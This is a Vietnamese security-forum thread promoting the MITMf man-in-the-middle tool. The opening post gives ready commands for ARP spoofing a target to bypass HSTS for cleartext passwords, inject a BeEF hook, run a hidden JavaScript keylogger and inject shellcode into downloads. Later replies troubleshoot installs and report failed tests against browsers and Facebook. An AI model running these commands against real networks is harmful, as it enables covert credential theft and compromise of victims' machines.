MITMF -- Công cụ MITM tuyệt vời!

Thảo luận trong 'Tools' bắt đầu bởi DDos, 31/08/15, 09:08 PM.

  1. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,756
    Đã được thích: 403
    Điểm thành tích:
    83
    Có thể nói trong mạng LAN, tấn công hiệu quả và nguy hiểm nhất là MITM. Với tấn công MITM, kẻ tấn công có thể ăn cắp cookie, ăn cắp thông tin cá nhân, tài khoản mạng xã hội, thậm chí là xâm nhập vào máy tính của nạn nhân. Hiện nay, có rất nhiều công cụ mã nguồn mở cho phép thực hiện các chức năng trên, nhưng để tìm một công cụ có thể làm được tất cả những chức năng trên thì có lẽ hơi khó. MITMF là một công cụ mà đáp ứng được yêu cầu này.
    MITMF được viết bởi Marcello Salvati sử dụng ngôn ngữ lập trình python.

    [​IMG]


    Với MITMF bạn có thể thực hiện rất nhiều kiểu tấn công khác nhau như spoof arp, spoof dns, spoof dhcp, phá vỡ cơ chế bảo mật HSTS, inject javascript, .... với cú pháp vô cùng đơn giản.

    Để cài đặt mitmf trong Kali Linux, các bạn dùng lệnh sau:

    apt-get install mitmf

    + Để phá vỡ cơ chế bảo mật HSTS để hiển thị mật khẩu ở dạng clear-text, bạn dùng lệnh sau:

    mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --hsts

    Để rõ hơn các bạn có thể xem video dưới đây:

    [video=youtube;cTAPu7BHIVc]https://www.youtube.com/watch?v=cTAPu7BHIVc[/video]

    + Bạn có thể xâm nhập máy tính, không cần tương tác của người dùng bằng cách inject BEEF hook js với lệnh:

    mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --js-url

    Để rõ hơn các bạn có thể xem video dưới đây

    + Inject jskeylogger để ghi lại toàn bộ thao tác bàn phím mà người dùng không hề biết với lệnh:

    mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --jskeylogger

    Để rõ hơn các bạn tham khảo video dưới đây:

    [video=youtube;6v7OQjU1s_Y]https://www.youtube.com/watch?v=6v7OQjU1s_Y[/video]

    + Inject shellcode vào gói tin với lệnh:

    mitmf -i wlan0/eth0 --spoof --arp --gateway 192.168.1.1 --target targetIP --filepwn

    Để rõ hơn các bạn tham khảo video dưới đây:

    [video=youtube;6v7OQjU1s_Y]https://www.youtube.com/watch?v=6v7OQjU1s_Y[/video]
     
    Last edited by a moderator: 31/08/15, 09:08 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. Duyduy8080

    Duyduy8080 W-------

    Tham gia: 07/10/14, 01:10 PM
    Bài viết: 25
    Đã được thích: 4
    Điểm thành tích:
    18
    Re: MITMF -- Công cụ MITM tuyệt vời!

    Cảm ơn bạn Ddos, cho mình hỏi thêm, hình ảnh thì bạn đưa version 0.9.7; trong video thì là 0.9.8. Mình cài 0.9.7 rồi có cách nào nâng cấp lên 0.9.8 không hay là phải cài mới? V 0.9.8 khác gì so với 0.9.7. Mình test thử hình như thằng Crome nó fix rồi, không bypass hsts được, IE 11 thì được, chứ IE Edge của Win 10 cũng không được. Hiện giờ thì phương pháp này còn hoạt động tốt hay không? tại vì mình test Facebook thì dù ở trình duyệt nào cũng ko được.Xin ý kiến của bạn
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,756
    Đã được thích: 403
    Điểm thành tích:
    83
    Re: MITMF -- Công cụ MITM tuyệt vời!

    Để nâng cấp lên phiên bản 0.9.8 thì bạn vào https://github.com/byt3bl33d3r/MITMf , tải file về. Phiên bản 0.9.8 chủ yếu là cập nhật các vấn đề liên quan tới bdf plug-in. Mình chưa test trên google-chrome trên máy tính, còn chrome trên điện thoại thì ok.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. vequeemnhe

    vequeemnhe Wh------

    Tham gia: 29/06/15, 08:06 PM
    Bài viết: 62
    Đã được thích: 20
    Điểm thành tích:
    18
    Re: MITMF -- Công cụ MITM tuyệt vời!

    Chrome trên SamSum Note3 không thể sniff Được.......... Đau:mad:
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. webattack

    webattack W-------

    Tham gia: 17/07/15, 11:07 AM
    Bài viết: 8
    Đã được thích: 4
    Điểm thành tích:
    8
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. DiepNV88

    DiepNV88 Super Moderator Thành viên BQT

    Tham gia: 24/09/13, 03:09 AM
    Bài viết: 1,525
    Đã được thích: 331
    Điểm thành tích:
    83
    Re: MITMF -- Công cụ MITM tuyệt vời!

    Tất nhiên là của anh em mod diễn đàn rùi em ah!
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. Hackerstudent98

    Hackerstudent98 W-------

    Tham gia: 21/03/15, 06:03 PM
    Bài viết: 75
    Đã được thích: 14
    Điểm thành tích:
    18
    A thất nghiệp ơi cho em hỏi , em chưa cài mitmf sử dụng lệnh apt-get install mitmf như cờ líp, xong trỏ tới opt/sniffiing-spoofing/mitmf thì lỗi như hình , thử download file 0.9.8 , em trỏ tới file mitmf - master chạy mifmt.py không ra . Lệnh chmod a+x, ls là gì vậy trước giờ làm theo chứa em không hiểu đâu chắc thế nó mới sai .
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,756
    Đã được thích: 403
    Điểm thành tích:
    83
    Trong Kali linux, nếu em dùng lệnh apt-get install mitmf thì nó sẽ nằm ở thư mục /usr/share/mitmf/ và mở terminal lên chỉ cần nhập mitmf là chạy được, Nhưng trong Kali, thường cập nhật khá chậm các công cụ không "chủ chốt" (version trong kali linux là 0.97), còn mitmf mới nhất là 0.98, nên anh tải về mitmf từ github đặt trong thư mục /opt/ ....chmod a+x là thay đổi permission, ls là liệt kê file, thư mục trong một path...
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. athena2309

    athena2309 W-------

    Tham gia: 16/03/15, 10:03 AM
    Bài viết: 31
    Đã được thích: 1
    Điểm thành tích:
    18
    up lai video dc khong vay. khong xem dc video
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. DiepNV88

    DiepNV88 Super Moderator Thành viên BQT

    Tham gia: 24/09/13, 03:09 AM
    Bài viết: 1,525
    Đã được thích: 331
    Điểm thành tích:
    83
    Do kênh Youtobe bị report die nên anh em thông cảm nhé. BQT sẽ sớm khắc phục vấn đề này.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  11. hoang cao

    hoang cao New Member

    Tham gia: 26/09/19, 01:09 PM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    ad còn mấy video mitmf k, cho xin với ạ ?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. DiepNV88

    DiepNV88 Super Moderator Thành viên BQT

    Tham gia: 24/09/13, 03:09 AM
    Bài viết: 1,525
    Đã được thích: 331
    Điểm thành tích:
    83
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan